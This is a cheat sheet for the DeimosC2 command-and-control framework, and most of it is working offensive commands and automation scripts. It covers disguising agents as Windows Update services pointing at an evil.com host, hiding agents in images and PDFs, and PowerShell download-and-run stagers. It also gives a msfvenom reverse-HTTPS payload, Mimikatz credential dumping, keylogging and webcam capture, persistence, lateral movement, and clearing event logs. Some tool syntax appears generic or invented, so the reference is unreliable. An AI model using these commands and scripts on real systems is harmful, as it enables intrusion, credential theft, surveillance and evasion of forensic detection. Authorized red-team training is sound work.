DeimosC2 Framework Cheat Sheet

Overview

DeimosC2 is a Golang-based post-exploitation command and control framework designed for red team operations and penetration testing. Built with modern architecture principles, DeimosC2 focuses on cross-platform compatibility, secure communications, and comprehensive post-exploitation capabilities while maintaining a lightweight footprint and advanced evasion techniques.

⚠️ Warning: This tool is intended for authorized penetration testing and red team exercises only. Ensure you have proper authorization before using against any target.

Installation

Prerequisites

# Install Go 1.18+ and Git
sudo apt update
sudo apt install -y golang-go git build-essential

# Verify Go installation
go version

# Set Go environment variables
export GOPATH=$HOME/go
export PATH=$PATH:$GOPATH/bin
echo 'export GOPATH=$HOME/go' >> ~/.bashrc
echo 'export PATH=$PATH:$GOPATH/bin' >> ~/.bashrc

Installation from GitHub

# Clone DeimosC2 repository
git clone https://github.com/DeimosC2/DeimosC2.git
cd DeimosC2

# Build the server
go mod tidy
go build -o deimosc2-server ./cmd/server

# Build the agent
go build -o deimosc2-agent ./cmd/agent

# Make executables
chmod +x deimosc2-server deimosc2-agent

Docker Installation

# Clone repository
git clone https://github.com/DeimosC2/DeimosC2.git
cd DeimosC2

# Build Docker image
docker build -t deimosc2 .

# Run DeimosC2 container
docker run -it --rm -p 8080:8080 -p 443:443 deimosc2

# Run with persistent data
docker run -it --rm -p 8080:8080 -p 443:443 -v $(pwd)/data:/app/data deimosc2

Cross-Platform Compilation

# Build for Windows (x64)
GOOS=windows GOARCH=amd64 go build -o deimosc2-agent.exe ./cmd/agent

# Build for Windows (x86)
GOOS=windows GOARCH=386 go build -o deimosc2-agent-x86.exe ./cmd/agent

# Build for Linux (x64)
GOOS=linux GOARCH=amd64 go build -o deimosc2-agent-linux ./cmd/agent

# Build for macOS (x64)
GOOS=darwin GOARCH=amd64 go build -o deimosc2-agent-macos ./cmd/agent

# Build for ARM64
GOOS=linux GOARCH=arm64 go build -o deimosc2-agent-arm64 ./cmd/agent

Basic Usage

Starting the Server

# Start DeimosC2 server with default settings
./deimosc2-server

# Start with custom configuration
./deimosc2-server -config config.json

# Start with specific interface and port
./deimosc2-server -host 0.0.0.0 -port 8080

# Start with HTTPS
./deimosc2-server -tls -cert server.crt -key server.key

# Start in debug mode
./deimosc2-server -debug

Configuration File

{
  "server": {
    "host": "0.0.0.0",
    "port": 8080,
    "tls": {
      "enabled": true,
      "cert_file": "server.crt",
      "key_file": "server.key"
    },
    "auth": {
      "username": "admin",
      "password": "SecurePassword123!"
    }
  },
  "database": {
    "type": "sqlite",
    "connection": "deimos.db"
  },
  "logging": {
    "level": "info",
    "file": "deimos.log"
  },
  "agents": {
    "check_in_interval": 30,
    "jitter": 10,
    "max_retries": 5
  }
}

Web Interface Access

# Access DeimosC2 web interface
http://localhost:8080

# HTTPS access
https://your-domain.com:443

# Default credentials (configurable)
Username: admin
Password: SecurePassword123!

Agent Deployment

Basic Agent Execution

# Windows agent
deimosc2-agent.exe -server http://192.168.1.100:8080

# Linux agent
./deimosc2-agent-linux -server http://192.168.1.100:8080

# macOS agent
./deimosc2-agent-macos -server http://192.168.1.100:8080

# Agent with custom parameters
./deimosc2-agent -server https://c2.example.com:443 -interval 60 -jitter 20

Agent Configuration Options

# Command line options
./deimosc2-agent -h

Options:
  -server string     C2 server URL (required)
  -interval int      Check-in interval in seconds (default: 30)
  -jitter int        Jitter percentage (default: 10)
  -user-agent string Custom User-Agent string
  -proxy string      Proxy URL (http://proxy:port)
  -cert string       Custom CA certificate file
  -insecure          Skip TLS certificate verification
  -debug             Enable debug logging

Steganographic Deployment

# Embed agent in image
cat image.jpg deimosc2-agent.exe > hidden.jpg

# Extract and execute
tail -c +[image_size] hidden.jpg > agent.exe
./agent.exe -server http://192.168.1.100:8080

# Embed in PDF
cat document.pdf deimosc2-agent.exe > hidden.pdf

Service Installation (Windows)

# Install as Windows service
sc create "DeimosAgent" binPath= "C:\Windows\Temp\deimosc2-agent.exe -server http://192.168.1.100:8080" start= auto
sc start "DeimosAgent"

# Install with custom service name
sc create "WindowsUpdateService" binPath= "C:\Windows\System32\deimosc2-agent.exe -server https://update.microsoft.com.evil.com:443" start= auto DisplayName= "Windows Update Service"

Command and Control

Agent Management

# List active agents
agents list

# Get agent information
agents info [agent_id]

# Execute command on agent
agents exec [agent_id] "whoami"

# Execute PowerShell on Windows agent
agents exec [agent_id] "powershell Get-Process"

# Kill agent
agents kill [agent_id]

# Rename agent
agents rename [agent_id] [new_name]

File Operations

# Download file from agent
download [agent_id] C:\Users\Administrator\Documents\sensitive.docx

# Upload file to agent
upload [agent_id] payload.exe C:\Windows\Temp\update.exe

# List directory contents
ls [agent_id] C:\Users\Administrator\Documents

# Change directory
cd [agent_id] C:\Windows\System32

# Create directory
mkdir [agent_id] C:\Windows\Temp\data

# Remove file
rm [agent_id] C:\Windows\Temp\payload.exe

Process Management

# List processes
ps [agent_id]

# Kill process
kill [agent_id] [pid]

# Start process
start [agent_id] notepad.exe

# Process injection
inject [agent_id] [pid] [shellcode_file]

# Memory dump
memdump [agent_id] [pid] output.dmp

Network Operations

# Network discovery
discover [agent_id] 192.168.1.0/24

# Port scan
portscan [agent_id] 192.168.1.100 80,443,22,3389

# ARP scan
arpscan [agent_id] 192.168.1.0/24

# Network interfaces
ifconfig [agent_id]

# Routing table
route [agent_id]

# Network connections
netstat [agent_id]

Advanced Features

Persistence Mechanisms

# Registry persistence (Windows)
persist registry [agent_id] HKCU "Software\Microsoft\Windows\CurrentVersion\Run" "WindowsUpdate" "C:\Windows\Temp\agent.exe"

# Scheduled task persistence (Windows)
persist schtask [agent_id] "SystemUpdate" "C:\Windows\Temp\agent.exe" "ONLOGON"

# Service persistence (Windows)
persist service [agent_id] "WindowsUpdateService" "C:\Windows\Temp\agent.exe"

# Cron persistence (Linux)
persist cron [agent_id] "*/5 * * * * /tmp/agent"

# Autostart persistence (Linux)
persist autostart [agent_id] "/tmp/agent"

# LaunchAgent persistence (macOS)
persist launchagent [agent_id] "com.apple.update" "/tmp/agent"

Privilege Escalation

# UAC bypass (Windows)
elevate uac [agent_id] [payload_path]

# Token manipulation (Windows)
elevate token [agent_id] [target_pid]

# Sudo exploitation (Linux)
elevate sudo [agent_id] [command]

# SUID exploitation (Linux)
elevate suid [agent_id]

# Kernel exploits
elevate kernel [agent_id] [exploit_name]

Lateral Movement

# WMI execution (Windows)
lateral wmi [agent_id] 192.168.1.100 administrator password123 "whoami"

# PSExec execution (Windows)
lateral psexec [agent_id] 192.168.1.100 admin pass123 "systeminfo"

# PowerShell remoting (Windows)
lateral winrm [agent_id] 192.168.1.100 administrator password123 "Get-Process"

# SSH execution (Linux/macOS)
lateral ssh [agent_id] 192.168.1.50 root password123 "uname -a"

# SMB execution
lateral smb [agent_id] 192.168.1.100 admin pass123 "dir C:\"

Credential Operations

# Dump credentials (Windows)
creds dump [agent_id]

# Mimikatz execution (Windows)
creds mimikatz [agent_id] "sekurlsa::logonpasswords"

# SAM dump (Windows)
creds sam [agent_id]

# LSA secrets (Windows)
creds lsa [agent_id]

# Browser credentials
creds browser [agent_id]

# SSH keys (Linux/macOS)
creds ssh [agent_id]

# Keychain dump (macOS)
creds keychain [agent_id]

Pivoting and Tunneling

# SOCKS proxy
pivot socks [agent_id] 1080

# Port forwarding
pivot portfwd [agent_id] 8080 192.168.1.100 80

# Reverse port forwarding
pivot rportfwd [agent_id] 3389 127.0.0.1 3389

# HTTP tunnel
pivot http [agent_id] 8080

# DNS tunnel
pivot dns [agent_id] tunnel.example.com

Data Collection

# Screenshot
screenshot [agent_id]

# Keylogger
keylog start [agent_id]
keylog stop [agent_id]
keylog dump [agent_id]

# Webcam capture
webcam [agent_id]

# Microphone recording
microphone [agent_id] 60

# Clipboard monitoring
clipboard [agent_id]

# File search
search [agent_id] C:\Users *.docx

# Registry search
regsearch [agent_id] HKLM password

Automation and Scripting

Go Automation Script

package main

import (
    "bytes"
    "encoding/json"
    "fmt"
    "io/ioutil"
    "net/http"
    "time"
)

type DeimosClient struct {
    BaseURL    string
    Username   string
    Password   string
    HTTPClient *http.Client
    Token      string
}

type Agent struct {
    ID       string `json:"id"`
    Hostname string `json:"hostname"`
    Username string `json:"username"`
    OS       string `json:"os"`
    IP       string `json:"ip"`
    Status   string `json:"status"`
}

type Command struct {
    AgentID string `json:"agent_id"`
    Command string `json:"command"`
    Args    string `json:"args"`
}

func NewDeimosClient(baseURL, username, password string) *DeimosClient {
    return &DeimosClient{
        BaseURL:    baseURL,
        Username:   username,
        Password:   password,
        HTTPClient: &http.Client{Timeout: 30 * time.Second},
    }
}

func (c *DeimosClient) Authenticate() error {
    authData := map[string]string{
        "username": c.Username,
        "password": c.Password,
    }
    
    jsonData, _ := json.Marshal(authData)
    resp, err := c.HTTPClient.Post(c.BaseURL+"/api/auth", "application/json", bytes.NewBuffer(jsonData))
    if err != nil {
        return err
    }
    defer resp.Body.Close()
    
    if resp.StatusCode == 200 {
        var result map[string]string
        json.NewDecoder(resp.Body).Decode(&result)
        c.Token = result["token"]
        return nil
    }
    
    return fmt.Errorf("authentication failed")
}

func (c *DeimosClient) GetAgents() ([]Agent, error) {
    req, _ := http.NewRequest("GET", c.BaseURL+"/api/agents", nil)
    req.Header.Set("Authorization", "Bearer "+c.Token)
    
    resp, err := c.HTTPClient.Do(req)
    if err != nil {
        return nil, err
    }
    defer resp.Body.Close()
    
    var agents []Agent
    json.NewDecoder(resp.Body).Decode(&agents)
    return agents, nil
}

func (c *DeimosClient) ExecuteCommand(agentID, command string) error {
    cmdData := Command{
        AgentID: agentID,
        Command: command,
    }
    
    jsonData, _ := json.Marshal(cmdData)
    req, _ := http.NewRequest("POST", c.BaseURL+"/api/execute", bytes.NewBuffer(jsonData))
    req.Header.Set("Authorization", "Bearer "+c.Token)
    req.Header.Set("Content-Type", "application/json")
    
    resp, err := c.HTTPClient.Do(req)
    if err != nil {
        return err
    }
    defer resp.Body.Close()
    
    return nil
}

func (c *DeimosClient) AutomatedRecon(agentID string) {
    commands := []string{
        "whoami",
        "hostname",
        "pwd",
        "ps",
        "ifconfig",
        "netstat -an",
        "uname -a",
    }
    
    for _, cmd := range commands {
        fmt.Printf("[+] Executing: %s\n", cmd)
        c.ExecuteCommand(agentID, cmd)
        time.Sleep(2 * time.Second)
    }
}

func (c *DeimosClient) EstablishPersistence(agentID string) {
    persistenceCommands := []string{
        "persist registry HKCU \"Software\\Microsoft\\Windows\\CurrentVersion\\Run\" \"WindowsUpdate\" \"C:\\Windows\\Temp\\agent.exe\"",
        "persist schtask \"SystemUpdate\" \"C:\\Windows\\Temp\\agent.exe\" \"ONLOGON\"",
        "persist service \"WindowsUpdateService\" \"C:\\Windows\\Temp\\agent.exe\"",
    }
    
    for _, cmd := range persistenceCommands {
        fmt.Printf("[+] Establishing persistence: %s\n", cmd)
        c.ExecuteCommand(agentID, cmd)
        time.Sleep(3 * time.Second)
    }
}

func main() {
    client := NewDeimosClient("http://192.168.1.100:8080", "admin", "SecurePassword123!")
    
    // Authenticate
    if err := client.Authenticate(); err != nil {
        fmt.Printf("Authentication failed: %v\n", err)
        return
    }
    
    // Get active agents
    agents, err := client.GetAgents()
    if err != nil {
        fmt.Printf("Failed to get agents: %v\n", err)
        return
    }
    
    fmt.Printf("[+] Found %d active agents\n", len(agents))
    
    // Process each agent
    for _, agent := range agents {
        fmt.Printf("[+] Processing agent: %s (%s)\n", agent.ID, agent.Hostname)
        
        // Perform reconnaissance
        client.AutomatedRecon(agent.ID)
        
        // Establish persistence
        client.EstablishPersistence(agent.ID)
        
        // Wait before processing next agent
        time.Sleep(10 * time.Second)
    }
}

Python Automation Script

#!/usr/bin/env python3
# DeimosC2 Python automation script

import requests
import json
import time
from urllib3.exceptions import InsecureRequestWarning

# Disable SSL warnings
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

class DeimosClient:
    def __init__(self, base_url, username, password):
        self.base_url = base_url.rstrip('/')
        self.username = username
        self.password = password
        self.session = requests.Session()
        self.session.verify = False
        self.token = None
    
    def authenticate(self):
        """Authenticate with DeimosC2 server"""
        auth_data = {
            'username': self.username,
            'password': self.password
        }
        
        response = self.session.post(f"{self.base_url}/api/auth", json=auth_data)
        if response.status_code == 200:
            self.token = response.json().get('token')
            self.session.headers.update({'Authorization': f'Bearer {self.token}'})
            print("[+] Authentication successful")
            return True
        else:
            print("[-] Authentication failed")
            return False
    
    def get_agents(self):
        """Get list of active agents"""
        response = self.session.get(f"{self.base_url}/api/agents")
        if response.status_code == 200:
            return response.json()
        return []
    
    def execute_command(self, agent_id, command):
        """Execute command on agent"""
        cmd_data = {
            'agent_id': agent_id,
            'command': command
        }
        
        response = self.session.post(f"{self.base_url}/api/execute", json=cmd_data)
        return response.status_code == 200
    
    def download_file(self, agent_id, remote_path, local_path):
        """Download file from agent"""
        download_data = {
            'agent_id': agent_id,
            'remote_path': remote_path
        }
        
        response = self.session.post(f"{self.base_url}/api/download", json=download_data)
        if response.status_code == 200:
            with open(local_path, 'wb') as f:
                f.write(response.content)
            return True
        return False
    
    def upload_file(self, agent_id, local_path, remote_path):
        """Upload file to agent"""
        with open(local_path, 'rb') as f:
            files = {'file': f}
            data = {
                'agent_id': agent_id,
                'remote_path': remote_path
            }
            response = self.session.post(f"{self.base_url}/api/upload", files=files, data=data)
        return response.status_code == 200
    
    def automated_recon(self, agent_id):
        """Perform automated reconnaissance"""
        commands = [
            "whoami",
            "hostname",
            "pwd",
            "ps",
            "ifconfig",
            "netstat -an",
            "uname -a"
        ]
        
        for cmd in commands:
            print(f"[+] Executing: {cmd}")
            self.execute_command(agent_id, cmd)
            time.sleep(2)
    
    def credential_harvesting(self, agent_id):
        """Harvest credentials from agent"""
        commands = [
            "creds dump",
            "creds mimikatz \"sekurlsa::logonpasswords\"",
            "creds sam",
            "creds browser"
        ]
        
        for cmd in commands:
            print(f"[+] Harvesting credentials: {cmd}")
            self.execute_command(agent_id, cmd)
            time.sleep(5)
    
    def establish_persistence(self, agent_id):
        """Establish persistence on agent"""
        persistence_commands = [
            'persist registry HKCU "Software\\Microsoft\\Windows\\CurrentVersion\\Run" "WindowsUpdate" "C:\\Windows\\Temp\\agent.exe"',
            'persist schtask "SystemUpdate" "C:\\Windows\\Temp\\agent.exe" "ONLOGON"',
            'persist service "WindowsUpdateService" "C:\\Windows\\Temp\\agent.exe"'
        ]
        
        for cmd in persistence_commands:
            print(f"[+] Establishing persistence: {cmd}")
            self.execute_command(agent_id, cmd)
            time.sleep(3)
    
    def lateral_movement(self, agent_id, targets):
        """Perform lateral movement"""
        for target in targets:
            commands = [
                f'lateral wmi {target} administrator password123 "whoami"',
                f'lateral psexec {target} admin pass123 "systeminfo"',
                f'lateral ssh {target} root password123 "uname -a"'
            ]
            
            for cmd in commands:
                print(f"[+] Lateral movement: {cmd}")
                self.execute_command(agent_id, cmd)
                time.sleep(3)

def main():
    client = DeimosClient("http://192.168.1.100:8080", "admin", "SecurePassword123!")
    
    # Authenticate
    if not client.authenticate():
        return
    
    # Get active agents
    agents = client.get_agents()
    print(f"[+] Found {len(agents)} active agents")
    
    # Process each agent
    for agent in agents:
        agent_id = agent['id']
        hostname = agent.get('hostname', 'unknown')
        print(f"[+] Processing agent: {agent_id} ({hostname})")
        
        # Perform reconnaissance
        client.automated_recon(agent_id)
        
        # Harvest credentials
        client.credential_harvesting(agent_id)
        
        # Establish persistence
        client.establish_persistence(agent_id)
        
        # Lateral movement
        targets = ["192.168.1.101", "192.168.1.102"]
        client.lateral_movement(agent_id, targets)
        
        # Wait before processing next agent
        time.sleep(10)

if __name__ == "__main__":
    main()

PowerShell Automation

# DeimosC2 PowerShell automation script

function Invoke-DeimosAutomation {
    param(
        [string]$ServerURL = "http://192.168.1.100:8080",
        [string]$Username = "admin",
        [string]$Password = "SecurePassword123!"
    )
    
    # Create web session
    $session = New-Object Microsoft.PowerShell.Commands.WebRequestSession
    
    # Authenticate
    $authData = @{
        username = $Username
        password = $Password
    } | ConvertTo-Json
    
    try {
        $authResponse = Invoke-WebRequest -Uri "$ServerURL/api/auth" -Method POST -Body $authData -ContentType "application/json" -WebSession $session
        $token = ($authResponse.Content | ConvertFrom-Json).token
        $session.Headers.Add("Authorization", "Bearer $token")
        Write-Host "[+] Authentication successful"
    }
    catch {
        Write-Error "Authentication failed: $_"
        return
    }
    
    # Get active agents
    try {
        $agentsResponse = Invoke-WebRequest -Uri "$ServerURL/api/agents" -WebSession $session
        $agents = $agentsResponse.Content | ConvertFrom-Json
        Write-Host "[+] Found $($agents.Count) active agents"
    }
    catch {
        Write-Error "Failed to get agents: $_"
        return
    }
    
    # Process each agent
    foreach ($agent in $agents) {
        $agentId = $agent.id
        $hostname = $agent.hostname
        Write-Host "[+] Processing agent: $agentId ($hostname)"
        
        # Reconnaissance commands
        $commands = @(
            "whoami",
            "hostname",
            "systeminfo",
            "tasklist",
            "ipconfig /all",
            "netstat -an"
        )
        
        foreach ($cmd in $commands) {
            $cmdData = @{
                agent_id = $agentId
                command = $cmd
            } | ConvertTo-Json
            
            try {
                Invoke-WebRequest -Uri "$ServerURL/api/execute" -Method POST -Body $cmdData -ContentType "application/json" -WebSession $session
                Write-Host "[+] Executed: $cmd"
                Start-Sleep -Seconds 2
            }
            catch {
                Write-Warning "Failed to execute command '$cmd': $_"
            }
        }
        
        # Establish persistence
        $persistenceCommands = @(
            'persist registry HKCU "Software\Microsoft\Windows\CurrentVersion\Run" "WindowsUpdate" "C:\Windows\Temp\agent.exe"',
            'persist schtask "SystemUpdate" "C:\Windows\Temp\agent.exe" "ONLOGON"'
        )
        
        foreach ($cmd in $persistenceCommands) {
            $cmdData = @{
                agent_id = $agentId
                command = $cmd
            } | ConvertTo-Json
            
            try {
                Invoke-WebRequest -Uri "$ServerURL/api/execute" -Method POST -Body $cmdData -ContentType "application/json" -WebSession $session
                Write-Host "[+] Persistence established: $cmd"
                Start-Sleep -Seconds 3
            }
            catch {
                Write-Warning "Failed to establish persistence: $_"
            }
        }
        
        # Wait before processing next agent
        Start-Sleep -Seconds 10
    }
}

# Execute automation
Invoke-DeimosAutomation

Integration with Other Tools

Metasploit Integration

# Use DeimosC2 for initial access, pivot to Metasploit
# Generate Metasploit payload
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.1.100 LPORT=8443 -f exe -o meterpreter.exe

# Upload via DeimosC2 agent
upload [agent_id] meterpreter.exe C:\Windows\Temp\update.exe

# Execute Metasploit payload
agents exec [agent_id] "C:\Windows\Temp\update.exe"

# Handle in Metasploit
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_https
set LHOST 192.168.1.100
set LPORT 8443
run

Empire Integration

# Generate Empire stager
# Use DeimosC2 for initial access, pivot to Empire

# From DeimosC2 agent
agents exec [agent_id] "powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.100/empire_stager.ps1')"

# Handle in Empire
./empire
listeners
uselistener http
set Host 192.168.1.100
set Port 8080
execute

Cobalt Strike Integration

# Beacon integration
# Generate Cobalt Strike beacon
# Use DeimosC2 for initial access, pivot to Beacon

# From DeimosC2 agent
agents exec [agent_id] "powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.100/beacon.ps1')"

# Handle in Cobalt Strike team server

Operational Security

Communication Security

# Use HTTPS with valid certificates
# Configure domain fronting
# Implement certificate pinning
# Use legitimate user agents

# Generate SSL certificates
openssl req -new -x509 -keyout server.key -out server.crt -days 365 -nodes

# Start DeimosC2 with SSL
./deimosc2-server -tls -cert server.crt -key server.key

Traffic Obfuscation

# Use custom user agents
# Implement jitter and delays
# Mimic legitimate traffic patterns
# Use common ports and protocols

# Example obfuscated agent execution
./deimosc2-agent -server https://cdn.example.com:443 -user-agent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" -jitter 30

Anti-Forensics

# Clear event logs
agents exec [agent_id] "wevtutil cl System"
agents exec [agent_id] "wevtutil cl Security"
agents exec [agent_id] "wevtutil cl Application"

# Clear PowerShell history
agents exec [agent_id] "powershell Remove-Item (Get-PSReadlineOption).HistorySavePath -Force"

# Timestomping
agents exec [agent_id] "powershell $(Get-Item file.exe).LastWriteTime = '01/01/2020 12:00:00'"

Troubleshooting

Common Issues

# Agent not connecting
1. Check firewall rules
2. Verify server configuration
3. Test network connectivity
4. Check certificate issues

# Go build issues
go mod tidy
go clean -cache

# SSL certificate issues
openssl req -new -x509 -keyout server.key -out server.crt -days 365 -nodes

Debug Mode

# Enable debug logging
./deimosc2-server -debug

# Agent debug mode
./deimosc2-agent -debug -server http://192.168.1.100:8080

# Check network connectivity
telnet 192.168.1.100 8080

Best Practices

Operational Planning

1. Pre-engagement setup: Configure server and compile agents before engagement
2. Agent management: Use descriptive agent names and organize by network
3. Communication protocols: Establish secure C2 communication channels
4. Data handling: Implement secure data collection and storage
5. Cleanup procedures: Plan for artifact removal and agent cleanup

Security Considerations

# Secure deployment
# Use strong authentication
# Enable HTTPS with valid certificates
# Implement network segmentation
# Regular security updates

# Agent management
# Use unique agent identifiers
# Implement agent timeouts
# Regular agent rotation
# Secure communication channels

Documentation and Reporting

# Operation documentation
# Maintain agent logs
# Document all activities
# Track compromised systems
# Generate executive reports

# Artifact tracking
# Monitor IOCs
# Document forensic artifacts
# Implement attribution prevention

Resources

• DeimosC2 GitHub Repository
• DeimosC2 Documentation
• Go Programming Language
• MITRE ATT&CK Framework
• SANS Red Team Operations

---

This cheat sheet provides a comprehensive reference for using DeimosC2 framework. Always ensure you have proper authorization before conducting red team operations or penetration testing.